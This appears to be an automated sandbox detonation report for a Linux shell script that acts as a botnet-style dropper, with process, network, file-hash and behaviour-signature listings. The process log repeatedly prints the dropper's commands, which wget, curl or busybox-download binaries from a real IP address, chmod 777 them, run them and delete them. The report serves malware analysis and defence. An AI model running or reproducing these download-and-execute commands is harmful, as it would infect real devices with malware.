[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/rm

[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/wget

[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/chmod

[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG

[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/rm

[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/wget

[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/chmod

[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt

[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/rm

[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 89.187.167.9:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 02:38

Reported

2024-11-14 02:41

Platform

debian9-armhf-20240729-en

Max time kernel

37s

Max time network

39s

Command Line

[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I N/A
N/A /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS N/A
N/A /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd N/A
N/A /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS N/A
N/A /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi N/A
N/A /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed N/A
N/A /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE N/A
N/A /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ N/A
N/A /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak N/A
N/A /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ N/A
N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L N/A
N/A /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG N/A
N/A /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt N/A
N/A /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS N/A
N/A /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd N/A
N/A /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS N/A
N/A /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I N/A
N/A /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed N/A
N/A /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE N/A
N/A /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ N/A
N/A /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi N/A
N/A /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak N/A
N/A /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ N/A
N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L N/A
N/A /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG N/A
N/A /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /usr/bin/curl N/A
File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /usr/bin/curl N/A
File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /usr/bin/curl N/A
File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /usr/bin/curl N/A
File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /usr/bin/curl N/A
File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /usr/bin/curl N/A
File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /usr/bin/curl N/A
File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /usr/bin/curl N/A
File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /usr/bin/curl N/A
File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /usr/bin/curl N/A
File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /usr/bin/curl N/A
File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /usr/bin/curl N/A
File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /usr/bin/curl N/A
File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /usr/bin/curl N/A
File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /usr/bin/curl N/A
File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /usr/bin/curl N/A
File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /usr/bin/curl N/A
File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /usr/bin/curl N/A
File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /usr/bin/curl N/A
File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /usr/bin/curl N/A
File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /usr/bin/curl N/A
File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /usr/bin/curl N/A
File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /usr/bin/curl N/A
File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /usr/bin/curl N/A
File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /usr/bin/curl N/A
File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /usr/bin/curl N/A
File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /usr/bin/curl N/A
File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /usr/bin/curl N/A

Processes

/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh

[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/chmod

[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/rm

[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/wget

[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/chmod

[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS

[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/rm

[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/wget

[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/chmod

[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd

[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/rm

[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/wget

[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/chmod

[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS

[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/rm

[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/wget

[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/chmod

[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi

[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/rm

[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/wget

[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/chmod

[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed

[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/rm

[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/wget

[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/chmod

[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE

[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/rm

[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/wget

[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/chmod

[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ

[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/rm

[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/chmod

[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak

[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/rm

[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/wget

[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/chmod

[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ

[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/rm

[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/chmod

[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F

[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/rm

[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/wget

[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/curl

